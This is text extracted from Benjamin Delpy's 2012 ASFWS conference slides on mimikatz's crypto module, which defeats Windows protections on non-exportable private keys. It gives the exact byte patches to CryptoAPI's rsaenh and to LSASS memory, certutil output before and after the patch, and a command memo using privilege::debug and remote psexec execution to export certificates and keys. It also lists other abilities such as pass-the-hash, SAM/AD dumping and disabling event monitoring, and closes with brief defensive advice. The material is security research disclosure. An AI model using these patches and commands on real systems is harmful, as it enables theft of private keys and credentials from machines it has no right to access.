technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory , Internet Explorer,
yourappshere
…) load some
DLL to deal with different cryptographic stuff : CSP (keys), smartcard reader, …
–
cryptdll.dll, rsaenh.dll, …
Process deal with cryptographic keys by this API…
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
40
mimikatz ::
crypto ::
capi
how it’s exported ( level
)
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
41
Process
CryptoAPI and RSA CSP
Exportable
?
Load
Private
Key
Exported
Key
yes
NTE_BAD_KEY_STATE
no
DPAPI
Decode
PLAYSKOOL
Ask
to export Key
mimikatz ::
crypto ::
patchcapi
because I own my process
When we want to export a certificate with its private key (or only the key), it goes in
rsaenh!CPExportKey
This function do all the work to prepare the export, and check if the key is exportable
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
42
mimikatz # crypto::
exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'
\
My
-
Benjamin Delpy
Container
Clé
: {470ADFBA
-
8718
-
4014
-
B05E
-
B30776B75A03}
Provider : Microsoft Enhanced Cryptographic Provider v1.0
Type : AT_KEYEXCHANGE
Exportabilité
:
NON
Taille
clé
: 2048
Export
privé
dans
'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin
Delpy.pfx
' :
KO
(0x8009000b)
Clé
non
valide
pour
l'utilisation
dans
l'état
spécifié
.
Export public
dans
'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin
Delpy.der
' : OK
================
Certificat
0 ================
Numéro
de
série
: 112169417a1c3ef46a301f99385f50680fa0
Émetteur
: CN=
GlobalSign
CodeSigning
CA
-
G2, O=
GlobalSign
nv
-
sa
, C=BE
Objet: CN=Benjamin Delpy, C=FR
Il ne
s'agit
pas d'un
certificat
racine
Hach
. cert. (sha1):
ab
9e 92 b9 43
ed
47 d9 15
bc
26 93 9e 24 a5 83 03 ac
aa
7e
Conteneur
de
clé
= {470ADFBA
-
8718
-
4014
-
B05E
-
B30776B75A03}
Fournisseur
= Microsoft Enhanced Cryptographic Provider v1.0
La
clé
privée
NE PEUT PAS
être
exportée
Succès
du test de
cryptage
CertUtil
:
-
exportPFX
ÉCHEC
de la
commande
:
0x8009000b
(
-
2146893813)
CertUtil
:
Clé
non
valide
pour
l'utilisation
dans
l'état
spécifié
.
Exportable
?
mimikatz ::
crypto ::
patchcapi
because I own my process
So what ? A module in my own process return that I can’t do something ?
CryptoAPI
is in my memory space, let’s
patch it !
I wrote “
4
” bytes in my memory space
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
43
.text:0AC0B7CB
0F 85
33 C7 FF
FF
jnz
continue_key_export_or_archive
.text:0AC0B7CB
90
nop
.
text:0AC0B7CC
E9
33 C7 FF
FF
jmp
continue_key_export_or_archive
.text:0AC1F749
0F 85
B6 3B FF
FF
jnz
continue_key_export_or_archive_prepare
.text:0AC1F749
90
nop
.text:0AC1F74A
E9
B6 3B FF
FF
jmp
continue_key_export_or_archive_prepare
mimikatz :: crypto ::
patchcapi
demo time !
Import, export, import as not exportable…. export
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
44
mimikatz ::
crypto ::
patchcapi
limitations
Because :
–
I’m lazy
–
I’ve seen in majority of case RSA keys for real life use
•
Elliptic Curve a little…
mimikatz
crypto::
patchcapi
only
deal with :
–
Microsoft Base Cryptographic Provider
v1.0
–
Microsoft Enhanced Cryptographic Provider
v1.0
–
Microsoft Enhanced RSA and AES Cryptographic
Provider
–
Microsoft RSA SChannel Cryptographic
Provider
–
Microsoft Strong Cryptographic
Provider
…all based
on
rsaenh.dll
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
45
mimikatz ::
crypto ::
cng
how it works
“Cryptography
API: Next Generation (CNG) is the long
-
term replacement for the
CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in
behavior
.”
–
http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
“To
comply with common criteria (CC) requirements,
the long
-
lived keys must be isolated
so that they are never present in the application process
. CNG currently supports the
storage of asymmetric private keys by using the Microsoft software KSP that is included
with Windows Server
2008 and Windows
Vista and installed by default.
This time, keys operations are not made in the “user” process context
Process use
RPC
to call “Key isolation service” (
keyiso
) functions
It seems more secure than CryptoAPI…
–
It is, but it’s not perfect…
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
46
mimikatz ::
crypto ::
cng
how it’s exported ( level
)
KeyIso
Service (LSASS
Process
)
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
47
Process
CNG
Exportable
?
Load
Private
Key
Exported
Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI
Decode
PLAYSKOOL
Ask
to export Key
NT6 System
protected
process
ML_SYSTEM
SYSTEM_MANDATORY_LABEL_
NO_WRITE_UP
SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz ::
crypto ::
patchcng
because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead
to
lsass
(
keyiso
):
ncrypt!SPCryptExportKey
This function do all the work to prepare the export, and check if the key is exportable
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
48
mimikatz # crypto::
exportKeys
[
user]
Clés
CNG :
-
cng_user_noexport
-
a3419340
-
5e5b
-
4b9a
-
bf08
-
d35d75a9b318
Exportabilité
: NON
Taille
clé
: 2048
Export
privé
dans
'cng_user_0_cng_user_noexport
-
a3419340
-
5e5b
-
4b9a
-
bf08
-
d35d75a9b318.pvk' :
KO
mod_cryptong
::
getPrivateKey
/
PrivateKeyBlobToPVK
: (0x80090029)
L'opération
demandée
n'est
pas
prise
en charge.
Exportable
?
mimikatz ::
crypto ::
patchcng
because sometimes I own LSASS
This time, checks and keys are in
LSASS
process…
And what ?
I wrote “1” byte in
LSASS
memory space…
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
49
.text:6C815210
75
1C
jnz
short
continue_key_export
.text:6C815210
EB
1C
jmp
short
continue_key_export
mimikatz :: crypto ::
patchcng
demo time !
Import, export, import as not exportable…. export
again
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
50
mimikatz ::
crypto ::
patchcng
limitations
Patch operation needs some privileges
–
Admin (debug privilege)
–
SYSTEM
mimikatz
crypto::
patchcng
only
deal with :
–
Microsoft Software Key Storage
Provider (maybe others
algs
than RSA)
Not a limitation of
mimikatz
, but MMC
addin
for certificates cannot
export CNG certificates… even those that are exportable (
hu
?)
–
certutil
can…
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
51
mimikatz ::
crypto ::
patchcng
bonus
After one admin patched LSASS, all users of current system benefit of extra
exports
–
until reboot /
KeyIso
service restart
Some others programs that doesn’t check the export flag before asking export
can work too
–
Yeah, like the old good one :
certutil
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
52
C:
\
Users
\
Gentil Kiwi
\
Desktop>
certutil
-
user
-
p
export_waza
-
privatekey
-
exportpfx
cng_user_noexport
test.pfx
MY
================
Certificat
1 ================
[…]
Hach
. cert. (sha1)
:
dc 00 c9 c7 9f 47 96 f2 8a
ff
2d 0e e3 f2 97 e3 6f c2
ce
8b
Conteneur
de
clé
= cng_user_noexport
-
a3419340
-
5e5b
-
4b9a
-
bf08
-
d35d75a9b318
Fournisseur
= Microsoft Software Key Storage Provider
La
clé
privée
NE PEUT PAS
être
exportée
Succès
du test de
chiffrement
CertUtil
:
-
exportPFX
ÉCHEC de la
commande
: 0x8009000b (
-
2146893813)
CertUtil
:
Clé
non
valide
pour
l'utilisation
dans
l'état
spécifié
.
C:
\
Users
\
Gentil Kiwi
\
Desktop>
certutil
-
user
-
p
export_waza
-
privatekey
-
exportpfx
cng_user_noexport
test.pfx
MY
================
Certificat
1 ================
[…]
Hach
. cert. (sha1)
:
dc 00 c9 c7 9f 47 96 f2 8a
ff
2d 0e e3 f2 97 e3 6f c2
ce
8b
Conteneur
de
clé
= cng_user_noexport
-
a3419340
-
5e5b
-
4b9a
-
bf08
-
d35d75a9b318
Fournisseur
= Microsoft Software Key Storage Provider
Succès
du test de
chiffrement
CertUtil
:
-
exportPFX
La
commande
s'est
terminée
correctement
.
mimikatz ::
crypto
memo
Some commands :
mimikatz
crypto::
patchcapi
crypto::
exportCertificates
exit
psexec
\
\
windows
-
s
-
c c:
\
mimikatz
\
Win32
\
mimikatz.exe
crypto
::
patchcapi
crypto
::
patchcng
"
crypto::
exportCertificates
CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::
exportKeys
computer"
exit
mimikatz #
crypto::
exportCertificates
CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote
Desktop"
mimikatz
privilege::debug crypto::
patchcng
crypto::
patchcapi
crypto
::
exportCertificates
crypto::
exportKeys
exit
Password :
–
PFX files are protected by this password :
mimikatz
Keys
–
When you import multiple time a certificate, exportable or not, Windows make duplicate keys
–
When you delete a certificate,
Windows does not delete its private
key
…
funny isn’t it
?
•
So yes, mimikatz can export it
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
53
mimikatz ::
crypto
what
we can do ?
Exactly the same as for
sekurlsa
, it will prevent access to
accounts / computer !
–
no admin, no admin, no admin…
Basics
–
Use
smartcards/token
for users certificates
–
Use Hardware Security Modules (
HSM
), even
SoftHSM
More in depth
–
See what Microsoft can do with
TPM
from Windows 8
•
Virtual
SmartCard
seems
promising
–
Verify vendors implementation (Lenovo
, Dell, …)
of TPM CSP/KSP
•
Their biometrics stuff was a little buggy ;)
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
54
mimikatz
what else can
it
do ?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop
event
monitoring
Patch Terminal Server
Basic GPO bypass
Applocker
/ SRP bypass
Driver
–
Play with tokens & privileges
–
Display SSDT x86 & x64
–
List
minifilters
actions
–
List Notifications (process / thread / image / registry)
–
List Objects hooks and procedures
–
…
…
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
55
mimikatz
that’s
all folks !
Thanks’ to /
Merci à :
–
my girlfriend for her support (her LSASS crashed few times)
–
Application Security Forum
to
offer me this great
opportunity
•
Partners and Sponsors for sure !
–
Microsoft
to
always consider
it as normal/
acceptable
–
Security friends/community for their ideas &
challenges
•
nagual
,
newsoft
,
mubix
, …
–
You, for your attention !
Questions ?
Don’t be shy ;)
especially if you have written the corresponding slide
number
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
56
Blog, Source Code &
Contact
blog
http
://blog.gentilkiwi.com
mimikatz
http://
blog.gentilkiwi.com/mimikatz
source
https://code.google.com/p/mimikatz
/
email
benjamin@gentilkiwi.com
07/11/2012
Benjamin DELPY `gentilkiwi` @ ASFWS 2012
-
benjamin@gentilkiwi.com ; blog.gentilkiwi.com
57
Enter the password to open this PDF file:
File name:
-
File size:
-
Title:
-
Author:
-
Subject:
-
Keywords:
-
Creation Date:
-
Modification Date:
-
Creator:
-
PDF Producer:
-
PDF Version:
-
Page Count:
-
Preparing document for printing…
0%
Comments 0
Log in to post a comment